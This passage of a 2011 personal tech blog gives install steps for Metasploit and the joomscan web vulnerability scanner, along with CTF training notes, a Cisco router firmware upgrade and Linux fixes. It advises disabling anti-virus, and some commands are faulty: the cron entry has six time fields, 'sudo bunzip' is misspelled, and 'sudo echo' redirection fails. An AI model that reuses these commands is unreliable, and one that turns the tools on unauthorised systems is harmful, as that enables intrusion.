        4. http://www.plenz.com/reverseshell

        9/02/2011

        Metasploit presentation for CTF

        We had a CTF training at the labs today, where I tried to present a brief introduction to metasploit. I seriously doubt I did the tool any justice, but a colleage has requested a copy of the sides as a PDF document. I have uploaded the slides to http://www.kush.com.fj/resources/metasploit-presentation.pdf. The presentation was mostly a demo using metasploitable. Perhaps in future there may be an opportunity to do a complete walk through of the metasploitable image posted here. I started I started work on a metasploit walkthrough, its still incomplete but its a star. You can find the walk through here http://nkush.blogspot.com/2011/09/metasploitable-walkthrough.html


        Installing Metasploit 4.0.0 on Apple Mac OS X 10.6.8

        The installation instructions are quite well documented on the Rapid7 documentation site[1]; But in my usual style of duplicating data on the Internet, I have documented my efforts below. The key requirements of Xcode and macports was already addressed on this particular machine :)

        Note: It's important to ensure that any anti-virus (AV) software is temporarily disabled and appropriate scanning exceptions added, this is to prevent the AV from quarenteening the exploits and payloads that some with metasploit.

        1. sudo bash
        2. port selfupdate
        3. port install ruby19 +nosuffix
        4. echo $PATH # Ensure that /opt/local/bin appears before /usr/bin, else edit ~/.bash_profile file and source it; ". ~/.bash_profile" or "source ~/.bash_profile"
        5. port install mysql5-server
        6. gem install mysql
        7. cd /opt
        8. wget http://updates.metasploit.com/data/releases/framework-4.0.0.tar.bz2
        9. bunzip2 framework-4.0.0.tar.bz2
        10. tar xvf framework-4.0.0.tar
        11. cd msf3
        12. svn update
        13. ln -s /opt/msf3/msf* /opt/local/bin/

        References:
        1. https://community.rapid7.com/docs/DOC-1037
        2. http://www.metasploit.com/download/

        8/27/2011

        WikiCFP

        WikiCFP is a useful wiki site that collates CFP.

        However am a bit disappointed that it does not automatically track to the following year for the same events, e.g. once a conference is over and the dates for the following year announced, it should link to the following years conference details, instead of manually searching for it.

        There is also an iPhone Application called WikiCFP that links to the site. Although functional, the application is not very intuitive, for the relatively high price of the application I was expecting more out of it, e.g. calendar integration, etc.

        Runtime on notebooks

        Got an Apple MacBook Pro towards the start of the year. Issue was that closing the lid only puts the machine in stand by mode which still consumes power, so I wasn't getting as long a runtime as I would on my old HP nx6120 with a travel battery.

        A Google search led me to Todd Huss's[2] page below. This identified the pmset[1] command as being quite useful. I followed the instructions and now have the MacBook hibernating when I close the lid. Since then I have been asked by a number of colleagues about this, so thought I better document it here.

        I rebuilt the old HP nx6120 to run Ubuntu 10.04 LTS. Again noticed that I wasn't getting reasonable runtime, instead of the usual 8-10 hrs, I only got around 3-4hrs. A discussion with a colleague led me to Linux Laptop Tools. Again some "Googling" led to the Ubuntu power management[3] which seemed to increase the runtime.

        References

        1. http://en.wikipedia.org/wiki/Pmset
        2. http://gabrito.com/post/hibernate-with-the-macbook-pro
        3. https://wiki.ubuntu.com/PowerManagement

        8/26/2011

        securingSCADA.info

        The securingSCADA.info site was launched earlier this year, it now boasts the wiki, that is slowly being populated with resource information on penetration testing, security compliance, etc.

        It's targeted towards individuals and organisations from academia and industry working in relation to SCADA, smart grid and related security areas. Of course everyone is welcome to sign up and contribute as the site is driven to providing security through collaboration.

        The site is located at http://www.securingscada.info

        8/24/2011

        Installing joomscan on Ubuntu 10.04 LTS

        OWASP Joomla! Security Scanner that "detects file inclusion, sql injection, command execution vulnerabilities of a target Joomla! web site." However it appears to have been neglected, but is promised to be updated soon.

        1. cd /opt
        2. sudo apt-get install -y libtest-www-mechanize-perl
        3. svn co https://joomscan.svn.sourceforge.net/svnroot/joomscan joomscan
        4. cd joomscan
        5. chmod 755 trunk/joomscan.pl
        6. trunk/joomscan.pl update

        8/23/2011

        Installing Metasploit 4.0.0 on Ubuntu 10.04 LTS

        Installing metasploit is quite easy. I have documented the installation instructions that I used below, however its just as simple to follow the more comprehensive instructions from the Rapid7/Metasploit site[1] (https://community.rapid7.com/docs/DOC-1296).



        1. sudo apt-get install -y ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems
        2. wget http://updates.metasploit.com/data/releases/framework-4.0.0.tar.bz2
        3. sudo mkdir /opt/metasploit4
        4. sudo bunzip framework-4.0.0.tar.bz2
        5. sudo tar xvf framework-4.0.0.tar
        6. sudo mv msf3 /opt/metasploit4
        7. sudo chown -R root:root /opt/metasploit4/msf3
        8. sudo ln -s /opt/metasploit4/msf3/msf* /usr/local/bin
        9. cd /opt/metasploit4/msf3
        10. sudo svn update
        11. sudo crontab -e -u root # Enter "1 * * * * * /usr/bin/svn update  /opt/metasploit4/msf3/ >> /var/log/msf3update.log 2>&1"
        12. sudo apt-get install -y mysql-server
        13. sudo apt-get install -y rubygems libmysqlclient-dev
        14. sudo apt-get install -y ruby-dev
        15. sudo gem install mysql


        References:
        1. https://community.rapid7.com/docs/DOC-1296


        7/09/2011

        Ubuntu apt-get error

        When performing an "apt-get update" I got the following error

        Reading package lists... Error!
        E: Dynamic MMap ran out of room. Please increase the size of APT::Cache-Limit. Current value: 25165824. (man 5 apt.conf)
        E: Error occurred while processing xxx
        E: Problem with MergeList /var/lib/apt/lists/xxx
        W: Unable to munmap
        E: The package lists or status file could not be parsed or opened.

        Am unsure why this is happening, but suspect it has something to do with the cache size allocated for the repositories. A quick Google search revealed a debian bug1 that helped.

        sudo echo 'APT::Cache-Limit "125829120";' > /etc/apt/apt.conf.d/30cache

        Seems to have fixed the problem, a quick sudo apt-get update and sudo apt-get upgrade had me happily hacking away again.

        References:
        1. https://bugs.launchpad.net/debian/+source/apt/+bug/24626

        4/03/2011

        Ramblings...

        I cannot speak for other students, but I find feedback and constructive criticism very useful to my education and overall performance. Unfortunately I am finding the latter increasingly absent from the current academic environment, esp. when it comes to submitting official forms to QUT. It seems like a black hole at times

        Oh well, “Such is life”. I seem to be quoting this a lot recently. Perhaps as a subconscious resignation to my lot in life. Just realised I have the same initials as Ned Kelly, but unfortunately his proper name was Edward Kelly, so I guess not...

        3/06/2011

        Cisco 857W Router - Upgrade ADSL Firmware

        To upgrade the ADSL firmware you need to get the latest .bin firmware file from Cisco. You will need a CCO and a valid contract to download the file.

        One you have this, copy the file to flash using a TFTP server. Then rename the file to remove the version number, then make a backup of the configuration file just in case and reboot the router. The reboot should force the new firmware to be loaded. Once rebooted verify the version of the firmware

        Check the version of the firmware current running
        show dsl interface ATM 0

        Init FW:         init_xxx-x.x.xxx.bin
        Operation FW:    xxx-x.x.x.bin
        FW Source:       xxxxxxxx
        FW Version:      x.x.x



        Check the amount of space available on flash for the firmware, ensure that the bytes free is greater than the size of the firmware .bin file
        show flash

        19353600 bytes total (5369856 bytes free)

        Copy the firmware .bin file to flash
        copy tftp://xxx.xxx.xxx.xxx/adsl_alc_20190.x.x.x.bin

        Rename the file on flash to adsl_alc_20190.bin
        rename flash:adsl_alc_20190.x.x.x.bin adsl_alc_20190.bin

        Reboot the router
        reload

        2/11/2011

        kush.id.au

        Got the kush.id.au domain and parked it over the kush.com.fj domain. So all subdomains and e-mail addresses should resolve for the id.au domain.Need to make some changes to the website to allow for this. Also need to upload some new Python scripts that I wrote.